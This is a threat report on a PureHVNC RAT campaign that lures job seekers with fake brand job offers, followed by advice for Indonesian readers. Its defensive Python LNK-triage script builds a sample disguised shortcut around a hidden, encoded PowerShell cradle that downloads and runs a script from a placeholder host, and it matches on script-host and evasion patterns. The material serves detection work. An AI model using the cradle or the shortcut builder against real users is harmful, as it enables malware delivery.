This cybersecurity report details a PureHVNC RAT campaign that infects victims through fake job offers from well-known global and Indonesian brands. The multi-stage infection chain combines PowerShell, JavaScript and AutoIt scripts with layered obfuscation and process hollowing to evade detection and keep control of infected Windows systems. #PureHVNC #AutoIt #ProcessHollowing #IndonesiaBrands
Keypoints:
- The campaign targets people seeking marketing roles; its lures include Indonesia's jewelry brand John Hardy, which makes it directly relevant to Indonesian citizens and businesses.
- Delivery begins with the download of a Windows shortcut (LNK) file whose name and icon mimic a PDF job offer from a reputable brand; opening it starts the infection chain.
- The malicious scripts are hidden behind several layers of obfuscation: base64 encoding, string replacement, and embedding inside fake MP4 files.
- Persistence is achieved with internet shortcut (.url) files that run obfuscated JavaScript at system startup.
- For stealthy execution the malware hollows a legitimate Windows .NET Framework process and injects its payload into it (process hollowing).
- The final payload is an obfuscated PureHVNC (hidden VNC) RAT delivered as an encrypted DLL that is decrypted in memory, giving the operator remote administration and control of the host.
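The LNK lure in the keypoints above is the one artefact a defender can pull apart before anything else runs, so here is a concrete triage step. The following Python is an added example, not code from the original report or from the campaign: it constructs a sample .pdf.lnk in memory (the filename, PowerShell command line and URL are made up for illustration and are not the campaign's real indicators) and then parses it with a minimal reader for the MS-SHLLINK binary format to recover the target, arguments, window mode and icon source, decoding any -EncodedCommand base64 on the way. The reader walks only the fixed 76-byte header and the StringData fields and skips over the LinkTargetIDList and LinkInfo structures, which in real samples may carry the resolved target path, so treat the relative path it reports as a hint rather than the authoritative target.

```python
import base64
import re
import struct

# MS-SHLLINK header constants: size, CLSID and the LinkFlags bits we need.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]  # fixed on-disk order
SW_SHOWMINNOACTIVE = 7  # ShowCommand that keeps the console window out of sight


def _string_data(text):
    """StringData field: CountCharacters (u16) then UTF-16LE chars, no terminator."""
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_sample_lnk(relative_path, working_dir, arguments, icon_location, show_command=1):
    """Constructed sample shortcut: 76-byte header, StringData fields, terminal block."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIH", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0,
                         show_command, 0) + b"\x00" * 10  # attrs, times, size, hotkey, reserved
    body = b"".join(_string_data(s) for s in (relative_path, working_dir, arguments, icon_location))
    return header + body + struct.pack("<I", 0)  # TerminalBlock ends the ExtraData section


def parse_lnk(data):
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk blob."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Windows shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    link = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (u16) followed by the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for name, bit in STRING_FIELDS:
        link[name] = None
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        link[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
        pos += count * width
    return link


# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(arguments):
    """Decode a -EncodedCommand value (base64 of a UTF-16LE script), or None."""
    match = _ENC_RE.search(arguments or "")
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_lnk(filename, data):
    """Indicators that a shortcut posing as a document is a script-launching lure."""
    indicators = []
    lower = filename.lower()
    if lower.endswith(".lnk") and lower[:-4].rsplit(".", 1)[-1] in {"pdf", "doc", "docx", "xls", "jpg"}:
        indicators.append("double extension: Explorer hides .lnk, so it displays as " + filename[:-4])
    link = parse_lnk(data)
    target = (link["relative_path"] or "").lower()
    args = link["arguments"] or ""
    if any(h in target for h in ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")):
        indicators.append("target is a script host: " + link["relative_path"])
    if link["show_command"] == SW_SHOWMINNOACTIVE:
        indicators.append("ShowCommand=SW_SHOWMINNOACTIVE (window hidden from the victim)")
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-e(?:p|xecutionpolicy)\s+bypass", args):
        indicators.append("PowerShell evasion switches (-nop / -w hidden / -ep bypass) in arguments")
    decoded = decode_encoded_command(args)
    if decoded is not None:
        indicators.append("-EncodedCommand decodes to: " + decoded)
    if re.search(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|https?://", args + " " + (decoded or "")):
        indicators.append("download cradle / URL in command line")
    icon = link["icon_location"] or ""
    if icon and icon.lower().rsplit("\\", 1)[-1] != target.rsplit("\\", 1)[-1]:
        indicators.append("icon borrowed from another file: " + icon)
    return indicators


# Constructed sample: filename, script and URL are illustrative, not the campaign's IOCs.
SAMPLE_NAME = "John_Hardy_Marketing_Job_Offer.pdf.lnk"
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/offer.mp4')"
SAMPLE_ARGS = "-nop -w hidden -ep bypass -enc " + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_LNK = build_sample_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    working_dir=r"C:\Users\Public",
    arguments=SAMPLE_ARGS,
    icon_location=r"%SystemRoot%\System32\imageres.dll",  # system DLL icon so it looks like a document
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    for indicator in triage_lnk(SAMPLE_NAME, SAMPLE_LNK):
        print("-", indicator)
```

On a real suspect file call `triage_lnk(path.name, path.read_bytes())`; a shortcut whose displayed name ends in .pdf but whose target is powershell.exe with `-w hidden` and an encoded command is exactly the pattern the report describes. Production triage should also resolve the LinkTargetIDList and LinkInfo target and hash the file for comparison with published indicators.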
Relationship to Indonesia and Recommended Actions:
- Because the lures impersonate Indonesian brands, the campaign very likely targets Indonesian users, so Indonesia faces elevated risk from this malware.
- Government and cybersecurity institutions should tighten email and download filtering to detect and block LNK files delivered under the guise of job offers.
- Strengthen public-private partnerships with the impersonated Indonesian brands for rapid threat-intelligence sharing, and keep blocklists of the associated phishing domains and C2 IP addresses current (e.g. 85.192.48.3 and 139.99.188.124).
- Deploy endpoint detection and response tooling that can identify script obfuscation, PowerShell abuse, and process hollowing on public-sector and critical-infrastructure systems.
- Run targeted awareness campaigns on employment-themed lures, and encourage reporting of suspicious recruitment messages that impersonate Indonesian brands.
What Indonesian Citizens Should Know and Do:
- Treat unsolicited job offers received by email or download with suspicion, especially files with double extensions such as ".pdf.lnk": by default Windows Explorer never displays the .lnk extension, so such a file appears as "offer.pdf" with only a small shortcut arrow on its icon to give it away.
- Verify the offer directly through the brand's official recruitment channels before opening anything.
- Do not open unexpected attachments or links claiming to come from high-profile brands; report suspicious emails to the cybersecurity authorities or to the impersonated company's security team.